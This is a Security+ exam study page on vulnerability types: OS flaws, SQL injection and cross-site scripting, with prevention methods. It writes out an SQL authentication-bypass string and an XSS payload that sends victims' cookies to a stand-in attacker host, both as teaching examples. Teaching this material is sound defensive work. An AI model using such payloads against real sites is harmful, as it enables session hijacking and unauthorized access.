2.1 Vulnerability types
📘CompTIA Security+ SY0-701
Introduction to Vulnerabilities
A vulnerability is a weakness in a system, application, or process that attackers can exploit to gain unauthorized access, cause damage, or steal information.
In this section, we’ll look at two common categories of vulnerabilities that appear in the Security+ exam:
- Operating System (OS)-based vulnerabilities
- Web-based vulnerabilities, such as SQL Injection (SQLi) and Cross-Site Scripting (XSS)
🧠 1. OS-Based Vulnerabilities
Operating System (OS)-based vulnerabilities occur when weaknesses exist in the core system software that manages a computer’s hardware and software resources.
If attackers exploit these weaknesses, they can gain elevated privileges, execute malicious code, or disrupt system operations.
✅ Common Types of OS-Based Vulnerabilities:
1. Unpatched or Outdated Systems
- When an OS is not updated regularly, it may contain known vulnerabilities.
- Attackers often scan networks to find devices running outdated OS versions.
- Example in IT context: A Windows Server missing critical security updates could be exploited by ransomware through known vulnerabilities (like EternalBlue used by WannaCry).
2. Privilege Escalation
- A user or attacker with limited access (e.g., a normal user) exploits an OS flaw to gain administrator/root-level privileges.
- This allows full control over the system, such as installing malware, disabling security tools, or accessing sensitive files.
- Example: A vulnerability in Linux’s kernel allows a normal user to run commands as root.
3. Misconfigurations
- Incorrect OS settings can expose systems to attacks.
- Common misconfigurations include:
- Weak file or folder permissions (e.g., Everyone can read/write system folders).
- Default admin accounts not disabled.
- Unnecessary services left running (e.g., FTP, Telnet).
- Attackers can exploit these settings to gain unauthorized access.
4. Insecure Default Settings
- Many OS installations come with insecure default settings for ease of use.
- For example, default network shares or open ports might expose the system.
- Security best practice: Always harden the OS after installation — disable unused services, change default passwords, and apply security baselines.
5. Kernel Vulnerabilities
- The kernel is the core part of the OS that interacts with hardware.
- A kernel vulnerability can allow attackers to:
- Run code in privileged mode.
- Access protected memory.
- Crash the entire system (DoS attack).
- Kernel exploits are extremely dangerous because they give complete control of the device.
6. Driver Vulnerabilities
- Device drivers (software that helps hardware communicate with the OS) may contain flaws.
- If exploited, attackers can execute malicious code at the system level.
- For instance, a vulnerable printer or graphics driver could allow privilege escalation.
🌐 2. Web-Based Vulnerabilities
Web-based vulnerabilities are weaknesses found in web applications, databases, or web servers.
They occur when web applications fail to validate or sanitize user input or mishandle session and authentication mechanisms.
Two of the most common web-based vulnerabilities covered in the Security+ exam are SQL Injection (SQLi) and Cross-Site Scripting (XSS).
🧩 2.1 SQL Injection (SQLi)
🔍 What It Is:
SQL Injection is an attack where an attacker inserts or injects malicious SQL commands into an application’s database query.
This happens when a web application doesn’t properly validate or sanitize user inputs that are sent to the database.
⚙️ How It Works:
- Web applications use SQL (Structured Query Language) to interact with databases (like retrieving user details, login info, etc.).
- If an input field (like a login box or search bar) doesn’t validate data, an attacker can inject malicious SQL code.
- This code can make the database:
- Reveal sensitive data.
- Modify or delete records.
- Bypass authentication.
- Even execute system-level commands in extreme cases.
🧠 Example (IT-related):
A website login page expects:
SELECT * FROM users WHERE username='user' AND password='pass';
An attacker enters:
' OR '1'='1
The query becomes:
SELECT * FROM users WHERE username='' OR '1'='1' AND password='';
Since '1'='1' is always true, the attacker can log in without valid credentials.
🔒 How to Prevent SQL Injection:
- Use parameterized queries or prepared statements instead of directly inserting user input into SQL commands.
- Implement input validation (allow only specific types of characters).
- Employ least privilege for database accounts — the web app should not use an admin account.
- Regularly patch database and web application software.
💻 2.2 Cross-Site Scripting (XSS)
🔍 What It Is:
Cross-Site Scripting (XSS) is a web vulnerability that allows attackers to inject malicious scripts (usually JavaScript) into web pages viewed by other users.
This occurs when a web application accepts user input and displays it back to users without proper validation or sanitization.
⚙️ How It Works:
- The attacker injects a malicious script (often in JavaScript) into a web page.
- When another user loads the page, their browser runs the malicious code.
- This can allow attackers to:
- Steal cookies or session tokens.
- Redirect users to malicious sites.
- Modify website content for phishing or defacement.
🧩 Types of XSS:
- Stored XSS (Persistent):
- The malicious code is permanently stored on the target server (e.g., in a comment or database).
- Every time someone views the affected page, the script executes automatically.
- Reflected XSS (Non-persistent):
- The malicious code is part of a URL or request and is “reflected” back by the web server.
- The victim must click on a specially crafted link.
- DOM-based XSS:
- The attack exploits vulnerabilities in the client-side JavaScript rather than the server.
- The script manipulates the page’s Document Object Model (DOM) directly in the browser.
🧠 Example (IT-related):
If a search field on a web page displays what users type without sanitization, an attacker could enter:
<script>document.location='http://malicious-site.com?cookie='+document.cookie</script>
Anyone viewing that page would unknowingly send their session cookie to the attacker.
🔒 How to Prevent XSS:
- Sanitize and validate all user input before displaying it.
- Use output encoding to escape HTML special characters (like
<and>). - Implement Content Security Policy (CSP) headers to restrict what scripts can run.
- Keep web application frameworks and plugins updated.
🛡️ Summary Table
| Vulnerability Type | Description | Attack Goal | Prevention |
|---|---|---|---|
| OS-Based | Weakness in operating system components or configuration | Gain unauthorized access or control | Patch OS, harden configurations, restrict privileges |
| SQL Injection (SQLi) | Injecting malicious SQL code into database queries | Access, modify, or delete database data | Parameterized queries, input validation, least privilege |
| Cross-Site Scripting (XSS) | Injecting malicious scripts into web pages | Steal cookies, hijack sessions, redirect users | Input validation, output encoding, CSP |
📘 Exam Tips (CompTIA Security+ SY0-701)
- Know the difference between OS-based and web-based vulnerabilities.
- Understand that SQLi targets databases, while XSS targets web users.
- Remember prevention techniques: validation, sanitization, patching, and least privilege.
- Be familiar with types of XSS (Stored, Reflected, DOM-based).
- Expect scenario-based questions describing an attack (e.g., “An attacker injected code into a website comment field that runs in other users’ browsers — what type of attack is this?” → Stored XSS).
